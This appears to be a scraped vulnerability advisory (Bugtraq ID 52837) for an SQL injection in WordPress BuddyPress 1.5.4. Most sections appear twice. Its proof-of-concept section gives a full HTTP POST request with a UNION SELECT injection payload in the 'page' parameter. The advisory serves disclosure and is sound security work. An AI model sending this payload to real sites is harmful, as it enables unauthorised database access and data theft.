WordPress BuddyPress 'page' Parameter SQL Injection Vulnerability
BID:52837
Info
WordPress BuddyPress 'page' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 52837 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 31 2012 12:00AM |
| Updated: | Mar 31 2012 12:00AM |
| Credit: | Ivan Terkin |
| Vulnerable: |
WordPress BuddyPress 1.5.4 |
| Not Vulnerable: |
WordPress BuddyPress 1.5.5 |
Discussion
WordPress BuddyPress 'page' Parameter SQL Injection Vulnerability
BuddyPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
BuddyPress 1.5.4 is vulnerable; other versions may also be affected.
BuddyPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
BuddyPress 1.5.4 is vulnerable; other versions may also be affected.
Exploit / POC
WordPress BuddyPress 'page' Parameter SQL Injection Vulnerability
An attacker can exploit the issue using a browser.
The following example request is available:
POST /wp-load.php HTTP/1.1
User-Agent: Mozilla
Host: example.com
Accept: */*
Referer: http://example.com/activity/?s=b
Connection: Keep-Alive
Content-Length: 153
Content-Type: application/x-www-form-urlencoded
action=activity_widget_filter&page=1%26exclude%3d1)and(1=0)UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))%3b--+
An attacker can exploit the issue using a browser.
The following example request is available:
POST /wp-load.php HTTP/1.1
User-Agent: Mozilla
Host: example.com
Accept: */*
Referer: http://example.com/activity/?s=b
Connection: Keep-Alive
Content-Length: 153
Content-Type: application/x-www-form-urlencoded
action=activity_widget_filter&page=1%26exclude%3d1)and(1=0)UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))%3b--+
Solution / Fix
WordPress BuddyPress 'page' Parameter SQL Injection Vulnerability
Solution:
Reportedly the vendor has fixed the issue, however, Symantec has not confirmed it. Please contact the vendor for more information.
Solution:
Reportedly the vendor has fixed the issue, however, Symantec has not confirmed it. Please contact the vendor for more information.
References
WordPress BuddyPress 'page' Parameter SQL Injection Vulnerability
References:
References:
- BuddyPress Homepage (BuddyPress)